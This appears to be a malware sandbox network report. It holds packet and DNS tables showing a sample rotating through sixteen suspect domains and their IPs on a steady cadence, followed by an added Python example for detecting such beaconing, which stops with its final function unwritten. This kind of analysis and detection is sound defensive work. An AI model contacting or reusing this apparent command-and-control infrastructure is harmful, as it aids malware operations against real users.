                                                      Sep 11, 2024 11:20:27.185648918 CEST8063366206.119.82.134192.168.2.4
                                                      Sep 11, 2024 11:20:27.185960054 CEST8063366206.119.82.134192.168.2.4
                                                      Sep 11, 2024 11:20:27.186100006 CEST6336680192.168.2.4206.119.82.134
                                                      Sep 11, 2024 11:20:27.397645950 CEST8063366206.119.82.134192.168.2.4
                                                      Sep 11, 2024 11:20:27.397782087 CEST6336680192.168.2.4206.119.82.134
                                                      Sep 11, 2024 11:20:27.778522968 CEST6336680192.168.2.4206.119.82.134
                                                      Sep 11, 2024 11:20:28.797682047 CEST6336780192.168.2.4206.119.82.134
                                                      Sep 11, 2024 11:20:28.802934885 CEST8063367206.119.82.134192.168.2.4
                                                      Sep 11, 2024 11:20:28.803005934 CEST6336780192.168.2.4206.119.82.134
                                                      Sep 11, 2024 11:20:28.819073915 CEST6336780192.168.2.4206.119.82.134
                                                      Sep 11, 2024 11:20:28.824112892 CEST8063367206.119.82.134192.168.2.4
                                                      Sep 11, 2024 11:20:28.824136972 CEST8063367206.119.82.134192.168.2.4
                                                      Sep 11, 2024 11:20:28.824148893 CEST8063367206.119.82.134192.168.2.4
                                                      Sep 11, 2024 11:20:28.824162960 CEST8063367206.119.82.134192.168.2.4
                                                      Sep 11, 2024 11:20:28.824174881 CEST8063367206.119.82.134192.168.2.4
                                                      Sep 11, 2024 11:20:28.824199915 CEST8063367206.119.82.134192.168.2.4
                                                      Sep 11, 2024 11:20:28.824213028 CEST8063367206.119.82.134192.168.2.4
                                                      Sep 11, 2024 11:20:28.824225903 CEST8063367206.119.82.134192.168.2.4
                                                      Sep 11, 2024 11:20:28.824238062 CEST8063367206.119.82.134192.168.2.4
                                                      Sep 11, 2024 11:20:29.713053942 CEST8063367206.119.82.134192.168.2.4
                                                      Sep 11, 2024 11:20:29.762686968 CEST6336780192.168.2.4206.119.82.134
                                                      Sep 11, 2024 11:20:29.947223902 CEST8063367206.119.82.134192.168.2.4
                                                      Sep 11, 2024 11:20:29.947293997 CEST6336780192.168.2.4206.119.82.134
                                                      Sep 11, 2024 11:20:30.325695992 CEST6336780192.168.2.4206.119.82.134
                                                      Sep 11, 2024 11:20:31.344034910 CEST6336880192.168.2.4206.119.82.134
                                                      Sep 11, 2024 11:20:31.348923922 CEST8063368206.119.82.134192.168.2.4
                                                      Sep 11, 2024 11:20:31.348999023 CEST6336880192.168.2.4206.119.82.134
                                                      Sep 11, 2024 11:20:31.357500076 CEST6336880192.168.2.4206.119.82.134
                                                      Sep 11, 2024 11:20:31.362344980 CEST8063368206.119.82.134192.168.2.4
                                                      Sep 11, 2024 11:20:32.262432098 CEST8063368206.119.82.134192.168.2.4
                                                      Sep 11, 2024 11:20:32.262454033 CEST8063368206.119.82.134192.168.2.4
                                                      Sep 11, 2024 11:20:32.268338919 CEST6336880192.168.2.4206.119.82.134
                                                      Sep 11, 2024 11:20:32.270920038 CEST6336880192.168.2.4206.119.82.134
                                                      Sep 11, 2024 11:20:32.275770903 CEST8063368206.119.82.134192.168.2.4
                                                      Sep 11, 2024 11:20:37.364309072 CEST6336980192.168.2.465.21.196.90
                                                      Sep 11, 2024 11:20:37.369143963 CEST806336965.21.196.90192.168.2.4
                                                      Sep 11, 2024 11:20:37.369209051 CEST6336980192.168.2.465.21.196.90
                                                      Sep 11, 2024 11:20:37.384572029 CEST6336980192.168.2.465.21.196.90
                                                      Sep 11, 2024 11:20:37.390460968 CEST806336965.21.196.90192.168.2.4
                                                      Sep 11, 2024 11:20:38.047235966 CEST806336965.21.196.90192.168.2.4
                                                      Sep 11, 2024 11:20:38.047261000 CEST806336965.21.196.90192.168.2.4
                                                      Sep 11, 2024 11:20:38.047406912 CEST6336980192.168.2.465.21.196.90
                                                      Sep 11, 2024 11:20:38.887784958 CEST6336980192.168.2.465.21.196.90
                                                      Sep 11, 2024 11:20:39.907728910 CEST6337080192.168.2.465.21.196.90
                                                      Sep 11, 2024 11:20:39.912887096 CEST806337065.21.196.90192.168.2.4
                                                      Sep 11, 2024 11:20:39.915810108 CEST6337080192.168.2.465.21.196.90
                                                      Sep 11, 2024 11:20:39.927700043 CEST6337080192.168.2.465.21.196.90
                                                      Sep 11, 2024 11:20:39.932492971 CEST806337065.21.196.90192.168.2.4
                                                      Sep 11, 2024 11:20:40.714804888 CEST806337065.21.196.90192.168.2.4
                                                      Sep 11, 2024 11:20:40.715521097 CEST806337065.21.196.90192.168.2.4
                                                      Sep 11, 2024 11:20:40.715590000 CEST6337080192.168.2.465.21.196.90
                                                      Sep 11, 2024 11:20:41.434803009 CEST6337080192.168.2.465.21.196.90
                                                      Sep 11, 2024 11:20:42.453394890 CEST6337180192.168.2.465.21.196.90
                                                      Sep 11, 2024 11:20:42.532670021 CEST806337165.21.196.90192.168.2.4
                                                      Sep 11, 2024 11:20:42.534504890 CEST6337180192.168.2.465.21.196.90
                                                      Sep 11, 2024 11:20:42.547439098 CEST6337180192.168.2.465.21.196.90
                                                      Sep 11, 2024 11:20:42.557440042 CEST806337165.21.196.90192.168.2.4
                                                      Sep 11, 2024 11:20:42.557697058 CEST806337165.21.196.90192.168.2.4
                                                      Sep 11, 2024 11:20:42.557708979 CEST806337165.21.196.90192.168.2.4
                                                      Sep 11, 2024 11:20:42.557718992 CEST806337165.21.196.90192.168.2.4
                                                      Sep 11, 2024 11:20:42.557810068 CEST806337165.21.196.90192.168.2.4
                                                      Sep 11, 2024 11:20:42.557820082 CEST806337165.21.196.90192.168.2.4
                                                      Sep 11, 2024 11:20:42.557827950 CEST806337165.21.196.90192.168.2.4
                                                      Sep 11, 2024 11:20:42.557842970 CEST806337165.21.196.90192.168.2.4
                                                      Sep 11, 2024 11:20:42.557878017 CEST806337165.21.196.90192.168.2.4
                                                      Sep 11, 2024 11:20:43.198985100 CEST806337165.21.196.90192.168.2.4
                                                      Sep 11, 2024 11:20:43.199035883 CEST6337180192.168.2.465.21.196.90
                                                      Sep 11, 2024 11:20:44.059773922 CEST6337180192.168.2.465.21.196.90
                                                      Sep 11, 2024 11:20:44.064888954 CEST806337165.21.196.90192.168.2.4
                                                      Sep 11, 2024 11:20:45.079235077 CEST6337280192.168.2.465.21.196.90
                                                      Sep 11, 2024 11:20:45.084582090 CEST806337265.21.196.90192.168.2.4
                                                      Sep 11, 2024 11:20:45.084661961 CEST6337280192.168.2.465.21.196.90
                                                      Sep 11, 2024 11:20:45.093060970 CEST6337280192.168.2.465.21.196.90
                                                      Sep 11, 2024 11:20:45.097879887 CEST806337265.21.196.90192.168.2.4
                                                      Sep 11, 2024 11:20:45.743110895 CEST806337265.21.196.90192.168.2.4
                                                      Sep 11, 2024 11:20:45.743184090 CEST806337265.21.196.90192.168.2.4
                                                      Sep 11, 2024 11:20:45.747098923 CEST6337280192.168.2.465.21.196.90
                                                      Sep 11, 2024 11:20:45.750066996 CEST6337280192.168.2.465.21.196.90
                                                      Sep 11, 2024 11:20:45.754966021 CEST806337265.21.196.90192.168.2.4
                                                      Sep 11, 2024 11:20:51.585716963 CEST6337380192.168.2.438.181.141.122
                                                      Sep 11, 2024 11:20:51.590660095 CEST806337338.181.141.122192.168.2.4
                                                      Sep 11, 2024 11:20:51.590744019 CEST6337380192.168.2.438.181.141.122
                                                      Sep 11, 2024 11:20:51.601202965 CEST6337380192.168.2.438.181.141.122
                                                      Sep 11, 2024 11:20:51.606126070 CEST806337338.181.141.122192.168.2.4
                                                      Sep 11, 2024 11:20:53.091767073 CEST806337338.181.141.122192.168.2.4
                                                      Sep 11, 2024 11:20:53.091788054 CEST806337338.181.141.122192.168.2.4
                                                      Sep 11, 2024 11:20:53.091856956 CEST6337380192.168.2.438.181.141.122
                                                      Sep 11, 2024 11:20:53.106808901 CEST6337380192.168.2.438.181.141.122
                                                      Sep 11, 2024 11:20:54.126298904 CEST6337480192.168.2.438.181.141.122
                                                      Sep 11, 2024 11:20:54.131577969 CEST806337438.181.141.122192.168.2.4
                                                      Sep 11, 2024 11:20:54.131660938 CEST6337480192.168.2.438.181.141.122
                                                      Sep 11, 2024 11:20:54.142148018 CEST6337480192.168.2.438.181.141.122
                                                      Sep 11, 2024 11:20:54.147068024 CEST806337438.181.141.122192.168.2.4
                                                      Sep 11, 2024 11:20:55.058460951 CEST806337438.181.141.122192.168.2.4
                                                      Sep 11, 2024 11:20:55.058487892 CEST806337438.181.141.122192.168.2.4
                                                      Sep 11, 2024 11:20:55.058547020 CEST6337480192.168.2.438.181.141.122
                                                      Sep 11, 2024 11:20:55.653820038 CEST6337480192.168.2.438.181.141.122
                                                      Sep 11, 2024 11:20:56.678848028 CEST6337580192.168.2.438.181.141.122
                                                      Sep 11, 2024 11:20:56.998507023 CEST806337538.181.141.122192.168.2.4
                                                      Sep 11, 2024 11:20:56.998676062 CEST6337580192.168.2.438.181.141.122
                                                      Sep 11, 2024 11:20:57.020370007 CEST6337580192.168.2.438.181.141.122
                                                      Sep 11, 2024 11:20:57.025403976 CEST806337538.181.141.122192.168.2.4
                                                      Sep 11, 2024 11:20:57.025446892 CEST806337538.181.141.122192.168.2.4
                                                      Sep 11, 2024 11:20:57.025463104 CEST806337538.181.141.122192.168.2.4
                                                      Sep 11, 2024 11:20:57.025535107 CEST806337538.181.141.122192.168.2.4
                                                      Sep 11, 2024 11:20:57.025547028 CEST806337538.181.141.122192.168.2.4
                                                      Sep 11, 2024 11:20:57.025605917 CEST806337538.181.141.122192.168.2.4
                                                      Sep 11, 2024 11:20:57.025618076 CEST806337538.181.141.122192.168.2.4
                                                      Sep 11, 2024 11:20:57.025629997 CEST806337538.181.141.122192.168.2.4
                                                      Sep 11, 2024 11:20:57.025643110 CEST806337538.181.141.122192.168.2.4
                                                      Sep 11, 2024 11:20:57.931412935 CEST806337538.181.141.122192.168.2.4
                                                      Sep 11, 2024 11:20:57.931921005 CEST806337538.181.141.122192.168.2.4
                                                      Sep 11, 2024 11:20:57.935817957 CEST6337580192.168.2.438.181.141.122
Sep 11, 2024 11:20:58.528405905 CEST | 63375 | 80 | 192.168.2.4 | 38.181.141.122
Sep 11, 2024 11:20:59.547454119 CEST | 63376 | 80 | 192.168.2.4 | 38.181.141.122
Sep 11, 2024 11:20:59.819679022 CEST | 80 | 63376 | 38.181.141.122 | 192.168.2.4
Sep 11, 2024 11:20:59.825373888 CEST | 63376 | 80 | 192.168.2.4 | 38.181.141.122
Sep 11, 2024 11:20:59.831751108 CEST | 63376 | 80 | 192.168.2.4 | 38.181.141.122
Sep 11, 2024 11:20:59.836672068 CEST | 80 | 63376 | 38.181.141.122 | 192.168.2.4
Sep 11, 2024 11:21:00.793679953 CEST | 80 | 63376 | 38.181.141.122 | 192.168.2.4
Sep 11, 2024 11:21:00.793699026 CEST | 80 | 63376 | 38.181.141.122 | 192.168.2.4
Sep 11, 2024 11:21:00.793822050 CEST | 63376 | 80 | 192.168.2.4 | 38.181.141.122
Sep 11, 2024 11:21:00.797712088 CEST | 63376 | 80 | 192.168.2.4 | 38.181.141.122
Sep 11, 2024 11:21:00.802548885 CEST | 80 | 63376 | 38.181.141.122 | 192.168.2.4
Sep 11, 2024 11:21:09.428206921 CEST | 63377 | 80 | 192.168.2.4 | 81.88.63.46
Sep 11, 2024 11:21:09.433105946 CEST | 80 | 63377 | 81.88.63.46 | 192.168.2.4
Sep 11, 2024 11:21:09.433208942 CEST | 63377 | 80 | 192.168.2.4 | 81.88.63.46
Sep 11, 2024 11:21:09.439260960 CEST | 63377 | 80 | 192.168.2.4 | 81.88.63.46
Sep 11, 2024 11:21:09.444086075 CEST | 80 | 63377 | 81.88.63.46 | 192.168.2.4
Sep 11, 2024 11:21:10.103210926 CEST | 80 | 63377 | 81.88.63.46 | 192.168.2.4
Sep 11, 2024 11:21:10.103313923 CEST | 80 | 63377 | 81.88.63.46 | 192.168.2.4
Sep 11, 2024 11:21:10.103458881 CEST | 63377 | 80 | 192.168.2.4 | 81.88.63.46
Sep 11, 2024 11:21:10.105956078 CEST | 63377 | 80 | 192.168.2.4 | 81.88.63.46
Sep 11, 2024 11:21:10.110920906 CEST | 80 | 63377 | 81.88.63.46 | 192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 11, 2024 11:17:24.246217966 CEST | 51275 | 53 | 192.168.2.4 | 1.1.1.1
Sep 11, 2024 11:17:24.449491024 CEST | 53 | 51275 | 1.1.1.1 | 192.168.2.4
Sep 11, 2024 11:17:33.769716978 CEST | 53 | 51817 | 162.159.36.2 | 192.168.2.4
Sep 11, 2024 11:17:34.406877995 CEST | 62443 | 53 | 192.168.2.4 | 1.1.1.1
Sep 11, 2024 11:17:34.413980007 CEST | 53 | 62443 | 1.1.1.1 | 192.168.2.4
Sep 11, 2024 11:17:40.171951056 CEST | 61276 | 53 | 192.168.2.4 | 1.1.1.1
Sep 11, 2024 11:17:40.204453945 CEST | 53 | 61276 | 1.1.1.1 | 192.168.2.4
Sep 11, 2024 11:17:54.125217915 CEST | 60174 | 53 | 192.168.2.4 | 1.1.1.1
Sep 11, 2024 11:17:54.651145935 CEST | 53 | 60174 | 1.1.1.1 | 192.168.2.4
Sep 11, 2024 11:18:07.782618046 CEST | 53596 | 53 | 192.168.2.4 | 1.1.1.1
Sep 11, 2024 11:18:07.794977903 CEST | 53 | 53596 | 1.1.1.1 | 192.168.2.4
Sep 11, 2024 11:18:20.922744989 CEST | 63524 | 53 | 192.168.2.4 | 1.1.1.1
Sep 11, 2024 11:18:21.096124887 CEST | 53 | 63524 | 1.1.1.1 | 192.168.2.4
Sep 11, 2024 11:18:34.422508955 CEST | 57486 | 53 | 192.168.2.4 | 1.1.1.1
Sep 11, 2024 11:18:35.193113089 CEST | 53 | 57486 | 1.1.1.1 | 192.168.2.4
Sep 11, 2024 11:18:48.812932968 CEST | 65281 | 53 | 192.168.2.4 | 1.1.1.1
Sep 11, 2024 11:18:48.831665993 CEST | 53 | 65281 | 1.1.1.1 | 192.168.2.4
Sep 11, 2024 11:19:01.968837023 CEST | 56485 | 53 | 192.168.2.4 | 1.1.1.1
Sep 11, 2024 11:19:01.983338118 CEST | 53 | 56485 | 1.1.1.1 | 192.168.2.4
Sep 11, 2024 11:19:15.125559092 CEST | 51551 | 53 | 192.168.2.4 | 1.1.1.1
Sep 11, 2024 11:19:15.155782938 CEST | 53 | 51551 | 1.1.1.1 | 192.168.2.4
Sep 11, 2024 11:19:28.500880957 CEST | 53802 | 53 | 192.168.2.4 | 1.1.1.1
Sep 11, 2024 11:19:28.718796968 CEST | 53 | 53802 | 1.1.1.1 | 192.168.2.4
Sep 11, 2024 11:19:42.172229052 CEST | 65533 | 53 | 192.168.2.4 | 1.1.1.1
Sep 11, 2024 11:19:42.304311037 CEST | 53 | 65533 | 1.1.1.1 | 192.168.2.4
Sep 11, 2024 11:19:55.937663078 CEST | 58083 | 53 | 192.168.2.4 | 1.1.1.1
Sep 11, 2024 11:19:55.962289095 CEST | 53 | 58083 | 1.1.1.1 | 192.168.2.4
Sep 11, 2024 11:20:09.095891953 CEST | 57424 | 53 | 192.168.2.4 | 1.1.1.1
Sep 11, 2024 11:20:09.751230001 CEST | 53 | 57424 | 1.1.1.1 | 192.168.2.4
Sep 11, 2024 11:20:22.892302990 CEST | 64142 | 53 | 192.168.2.4 | 1.1.1.1
Sep 11, 2024 11:20:23.296435118 CEST | 53 | 64142 | 1.1.1.1 | 192.168.2.4
Sep 11, 2024 11:20:37.282587051 CEST | 50102 | 53 | 192.168.2.4 | 1.1.1.1
Sep 11, 2024 11:20:37.361391068 CEST | 53 | 50102 | 1.1.1.1 | 192.168.2.4
Sep 11, 2024 11:20:50.766944885 CEST | 61302 | 53 | 192.168.2.4 | 1.1.1.1
Sep 11, 2024 11:20:51.583141088 CEST | 53 | 61302 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Sep 11, 2024 11:17:24.246217966 CEST | 192.168.2.4 | 1.1.1.1 | 0xb7ca | Standard query (0) | www.2bhp.com | A (IP address) | IN (0x0001) | false
Sep 11, 2024 11:17:34.406877995 CEST | 192.168.2.4 | 1.1.1.1 | 0xc1 | Standard query (0) | 206.23.85.13.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
Sep 11, 2024 11:17:40.171951056 CEST | 192.168.2.4 | 1.1.1.1 | 0xfd29 | Standard query (0) | www.ultraleap.net | A (IP address) | IN (0x0001) | false
Sep 11, 2024 11:17:54.125217915 CEST | 192.168.2.4 | 1.1.1.1 | 0x6b84 | Standard query (0) | www.dalong.site | A (IP address) | IN (0x0001) | false
Sep 11, 2024 11:18:07.782618046 CEST | 192.168.2.4 | 1.1.1.1 | 0x1de9 | Standard query (0) | www.mgeducacaopro.online | A (IP address) | IN (0x0001) | false
Sep 11, 2024 11:18:20.922744989 CEST | 192.168.2.4 | 1.1.1.1 | 0xb408 | Standard query (0) | www.heldhold.xyz | A (IP address) | IN (0x0001) | false
Sep 11, 2024 11:18:34.422508955 CEST | 192.168.2.4 | 1.1.1.1 | 0x93d4 | Standard query (0) | www.63582.photo | A (IP address) | IN (0x0001) | false
Sep 11, 2024 11:18:48.812932968 CEST | 192.168.2.4 | 1.1.1.1 | 0xdbba | Standard query (0) | www.useanecdotenow.tech | A (IP address) | IN (0x0001) | false
Sep 11, 2024 11:19:01.968837023 CEST | 192.168.2.4 | 1.1.1.1 | 0x4f28 | Standard query (0) | www.asiapartnars.online | A (IP address) | IN (0x0001) | false
Sep 11, 2024 11:19:15.125559092 CEST | 192.168.2.4 | 1.1.1.1 | 0x2b77 | Standard query (0) | www.linkwave.cloud | A (IP address) | IN (0x0001) | false
Sep 11, 2024 11:19:28.500880957 CEST | 192.168.2.4 | 1.1.1.1 | 0x5bdd | Standard query (0) | www.mfgarage.net | A (IP address) | IN (0x0001) | false
Sep 11, 2024 11:19:42.172229052 CEST | 192.168.2.4 | 1.1.1.1 | 0xe26c | Standard query (0) | www.b5x7vk.agency | A (IP address) | IN (0x0001) | false
Sep 11, 2024 11:19:55.937663078 CEST | 192.168.2.4 | 1.1.1.1 | 0xc182 | Standard query (0) | www.rtpngk.xyz | A (IP address) | IN (0x0001) | false
Sep 11, 2024 11:20:09.095891953 CEST | 192.168.2.4 | 1.1.1.1 | 0xa279 | Standard query (0) | www.doggieradio.net | A (IP address) | IN (0x0001) | false
Sep 11, 2024 11:20:22.892302990 CEST | 192.168.2.4 | 1.1.1.1 | 0x2548 | Standard query (0) | www.40wxd.top | A (IP address) | IN (0x0001) | false
Sep 11, 2024 11:20:37.282587051 CEST | 192.168.2.4 | 1.1.1.1 | 0x9c67 | Standard query (0) | www.030002304.xyz | A (IP address) | IN (0x0001) | false
Sep 11, 2024 11:20:50.766944885 CEST | 192.168.2.4 | 1.1.1.1 | 0xc5e9 | Standard query (0) | www.kfowks.site | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Sep 11, 2024 11:17:24.449491024 CEST | 1.1.1.1 | 192.168.2.4 | 0xb7ca | No error (0) | www.2bhp.com | | 81.88.63.46 | A (IP address) | IN (0x0001) | false
Sep 11, 2024 11:17:34.413980007 CEST | 1.1.1.1 | 192.168.2.4 | 0xc1 | Name error (3) | 206.23.85.13.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
Sep 11, 2024 11:17:40.204453945 CEST | 1.1.1.1 | 192.168.2.4 | 0xfd29 | No error (0) | www.ultraleap.net | webredir.vip.gandi.net | | CNAME (Canonical name) | IN (0x0001) | false
Sep 11, 2024 11:17:40.204453945 CEST | 1.1.1.1 | 192.168.2.4 | 0xfd29 | No error (0) | webredir.vip.gandi.net | | 217.70.184.50 | A (IP address) | IN (0x0001) | false
Sep 11, 2024 11:17:54.651145935 CEST | 1.1.1.1 | 192.168.2.4 | 0x6b84 | No error (0) | www.dalong.site | dalong.site | | CNAME (Canonical name) | IN (0x0001) | false
Sep 11, 2024 11:17:54.651145935 CEST | 1.1.1.1 | 192.168.2.4 | 0x6b84 | No error (0) | dalong.site | | 172.96.187.60 | A (IP address) | IN (0x0001) | false
Sep 11, 2024 11:18:07.794977903 CEST | 1.1.1.1 | 192.168.2.4 | 0x1de9 | No error (0) | www.mgeducacaopro.online | mgeducacaopro.online | | CNAME (Canonical name) | IN (0x0001) | false
Sep 11, 2024 11:18:07.794977903 CEST | 1.1.1.1 | 192.168.2.4 | 0x1de9 | No error (0) | mgeducacaopro.online | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Sep 11, 2024 11:18:07.794977903 CEST | 1.1.1.1 | 192.168.2.4 | 0x1de9 | No error (0) | mgeducacaopro.online | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Sep 11, 2024 11:18:21.096124887 CEST | 1.1.1.1 | 192.168.2.4 | 0xb408 | No error (0) | www.heldhold.xyz | | 67.223.117.189 | A (IP address) | IN (0x0001) | false
Sep 11, 2024 11:18:35.193113089 CEST | 1.1.1.1 | 192.168.2.4 | 0x93d4 | No error (0) | www.63582.photo | 6ybpt9er.as66588.com | | CNAME (Canonical name) | IN (0x0001) | false
Sep 11, 2024 11:18:35.193113089 CEST | 1.1.1.1 | 192.168.2.4 | 0x93d4 | No error (0) | 6ybpt9er.as66588.com | azkwupgf.as66588.com | | CNAME (Canonical name) | IN (0x0001) | false
Sep 11, 2024 11:18:35.193113089 CEST | 1.1.1.1 | 192.168.2.4 | 0x93d4 | No error (0) | azkwupgf.as66588.com | | 147.92.40.175 | A (IP address) | IN (0x0001) | false
Sep 11, 2024 11:18:48.831665993 CEST | 1.1.1.1 | 192.168.2.4 | 0xdbba | No error (0) | www.useanecdotenow.tech | useanecdotenow.tech | | CNAME (Canonical name) | IN (0x0001) | false
Sep 11, 2024 11:18:48.831665993 CEST | 1.1.1.1 | 192.168.2.4 | 0xdbba | No error (0) | useanecdotenow.tech | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Sep 11, 2024 11:18:48.831665993 CEST | 1.1.1.1 | 192.168.2.4 | 0xdbba | No error (0) | useanecdotenow.tech | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Sep 11, 2024 11:19:01.983338118 CEST | 1.1.1.1 | 192.168.2.4 | 0x4f28 | No error (0) | www.asiapartnars.online | asiapartnars.online | | CNAME (Canonical name) | IN (0x0001) | false
Sep 11, 2024 11:19:01.983338118 CEST | 1.1.1.1 | 192.168.2.4 | 0x4f28 | No error (0) | asiapartnars.online | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Sep 11, 2024 11:19:01.983338118 CEST | 1.1.1.1 | 192.168.2.4 | 0x4f28 | No error (0) | asiapartnars.online | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Sep 11, 2024 11:19:15.155782938 CEST | 1.1.1.1 | 192.168.2.4 | 0x2b77 | No error (0) | www.linkwave.cloud | linkwave.cloud | | CNAME (Canonical name) | IN (0x0001) | false
Sep 11, 2024 11:19:15.155782938 CEST | 1.1.1.1 | 192.168.2.4 | 0x2b77 | No error (0) | linkwave.cloud | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Sep 11, 2024 11:19:15.155782938 CEST | 1.1.1.1 | 192.168.2.4 | 0x2b77 | No error (0) | linkwave.cloud | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Sep 11, 2024 11:19:28.718796968 CEST | 1.1.1.1 | 192.168.2.4 | 0x5bdd | No error (0) | www.mfgarage.net | | 85.153.138.113 | A (IP address) | IN (0x0001) | false
Sep 11, 2024 11:19:42.304311037 CEST | 1.1.1.1 | 192.168.2.4 | 0xe26c | No error (0) | www.b5x7vk.agency | | 104.21.11.31 | A (IP address) | IN (0x0001) | false
Sep 11, 2024 11:19:42.304311037 CEST | 1.1.1.1 | 192.168.2.4 | 0xe26c | No error (0) | www.b5x7vk.agency | | 172.67.165.25 | A (IP address) | IN (0x0001) | false
Sep 11, 2024 11:19:55.962289095 CEST | 1.1.1.1 | 192.168.2.4 | 0xc182 | No error (0) | www.rtpngk.xyz | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Sep 11, 2024 11:19:55.962289095 CEST | 1.1.1.1 | 192.168.2.4 | 0xc182 | No error (0) | www.rtpngk.xyz | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Sep 11, 2024 11:20:09.751230001 CEST | 1.1.1.1 | 192.168.2.4 | 0xa279 | No error (0) | www.doggieradio.net | doggieradio.net | | CNAME (Canonical name) | IN (0x0001) | false
Sep 11, 2024 11:20:09.751230001 CEST | 1.1.1.1 | 192.168.2.4 | 0xa279 | No error (0) | doggieradio.net | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Sep 11, 2024 11:20:09.751230001 CEST | 1.1.1.1 | 192.168.2.4 | 0xa279 | No error (0) | doggieradio.net | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Sep 11, 2024 11:20:23.296435118 CEST | 1.1.1.1 | 192.168.2.4 | 0x2548 | No error (0) | www.40wxd.top | 40wxd.top | | CNAME (Canonical name) | IN (0x0001) | false
Sep 11, 2024 11:20:23.296435118 CEST | 1.1.1.1 | 192.168.2.4 | 0x2548 | No error (0) | 40wxd.top | | 206.119.82.134 | A (IP address) | IN (0x0001) | false
Sep 11, 2024 11:20:37.361391068 CEST | 1.1.1.1 | 192.168.2.4 | 0x9c67 | No error (0) | www.030002304.xyz | 030002304.xyz | | CNAME (Canonical name) | IN (0x0001) | false
Sep 11, 2024 11:20:37.361391068 CEST | 1.1.1.1 | 192.168.2.4 | 0x9c67 | No error (0) | 030002304.xyz | | 65.21.196.90 | A (IP address) | IN (0x0001) | false
Sep 11, 2024 11:20:51.583141088 CEST | 1.1.1.1 | 192.168.2.4 | 0xc5e9 | No error (0) | www.kfowks.site | | 38.181.141.122 | A (IP address) | IN (0x0001) | false
                                                      • www.2bhp.com
                                                      • www.ultraleap.net
                                                      • www.dalong.site
                                                      • www.mgeducacaopro.online
                                                      • www.heldhold.xyz
                                                      • www.63582.photo
                                                      • www.useanecdotenow.tech
                                                      • www.asiapartnars.online
                                                      • www.linkwave.cloud
                                                      • www.mfgarage.net
                                                      • www.b5x7vk.agency
                                                      • www.rtpngk.xyz
                                                      • www.doggieradio.net
                                                      • www.40wxd.top
                                                      • www.030002304.xyz
                                                      • www.kfowks.site
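The query table above shows one forward lookup of a fresh www.* name roughly every 13 to 14 seconds, each name used once and then abandoned; that steady walk through a long list of unrelated domains is what separates the sample's domain rotation from ordinary browsing. The Python below is an added example (not part of the Joe Sandbox report) that measures that cadence over the sixteen A lookups copied from the table. The thresholds min_domains and max_jitter are the example's own choices, the registered-domain helper is a deliberately crude "www." strip, and the benign comparison input is constructed.

```python
import re
import statistics
from datetime import datetime

# Constructed input: the sixteen forward (A) lookups from the DNS query table of
# this report, as "timestamp  name". The single PTR lookup is left out because
# the example only looks at the rotating www.* names.
DNS_QUERIES = """\
Sep 11, 2024 11:17:24.246217966 CEST  www.2bhp.com
Sep 11, 2024 11:17:40.171951056 CEST  www.ultraleap.net
Sep 11, 2024 11:17:54.125217915 CEST  www.dalong.site
Sep 11, 2024 11:18:07.782618046 CEST  www.mgeducacaopro.online
Sep 11, 2024 11:18:20.922744989 CEST  www.heldhold.xyz
Sep 11, 2024 11:18:34.422508955 CEST  www.63582.photo
Sep 11, 2024 11:18:48.812932968 CEST  www.useanecdotenow.tech
Sep 11, 2024 11:19:01.968837023 CEST  www.asiapartnars.online
Sep 11, 2024 11:19:15.125559092 CEST  www.linkwave.cloud
Sep 11, 2024 11:19:28.500880957 CEST  www.mfgarage.net
Sep 11, 2024 11:19:42.172229052 CEST  www.b5x7vk.agency
Sep 11, 2024 11:19:55.937663078 CEST  www.rtpngk.xyz
Sep 11, 2024 11:20:09.095891953 CEST  www.doggieradio.net
Sep 11, 2024 11:20:22.892302990 CEST  www.40wxd.top
Sep 11, 2024 11:20:37.282587051 CEST  www.030002304.xyz
Sep 11, 2024 11:20:50.766944885 CEST  www.kfowks.site
"""

# Constructed control input: a few browsing-style lookups at irregular times.
BENIGN_QUERIES = """\
Sep 11, 2024 11:17:24.000000000 CEST  www.example.com
Sep 11, 2024 11:17:24.300000000 CEST  cdn.example.com
Sep 11, 2024 11:17:31.900000000 CEST  www.example.com
Sep 11, 2024 11:18:02.100000000 CEST  login.example.org
"""

TS_RE = re.compile(r"^(\w{3} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2})\.(\d{1,9}) \w+\s+(\S+)$")


def parse_line(line: str):
    """Return (seconds_since_epoch, name) for one report-style line.
    The zone name is ignored: every row of one report is in the same zone."""
    m = TS_RE.match(line.strip())
    if not m:
        raise ValueError(f"unparsable line: {line!r}")
    base = datetime.strptime(m.group(1), "%b %d, %Y %H:%M:%S")
    frac = int(m.group(2).ljust(9, "0")) / 1e9      # nanosecond field -> seconds
    return base.timestamp() + frac, m.group(3).lower()


def parse_queries(text: str) -> list:
    return [parse_line(l) for l in text.splitlines() if l.strip()]


def registered_domain(name: str) -> str:
    """Crude 'www.' stripping (example choice); use a public-suffix list in production."""
    return name[4:] if name.startswith("www.") else name


def rotation_stats(queries: list) -> dict:
    """Count distinct domains and measure the gaps between consecutive lookups."""
    ts = sorted(t for t, _ in queries)
    gaps = [b - a for a, b in zip(ts, ts[1:])]
    domains = {registered_domain(n) for _, n in queries}
    return {
        "n_queries": len(queries),
        "n_domains": len(domains),
        "median_interval": statistics.median(gaps) if gaps else 0.0,
        "min_interval": min(gaps) if gaps else 0.0,
        "max_interval": max(gaps) if gaps else 0.0,
    }


def looks_like_rotating_beacon(stats: dict, min_domains: int = 8, max_jitter: float = 0.25) -> bool:
    """Many distinct domains, each looked up about once, at a steady cadence.
    min_domains and max_jitter are this example's thresholds, not report values."""
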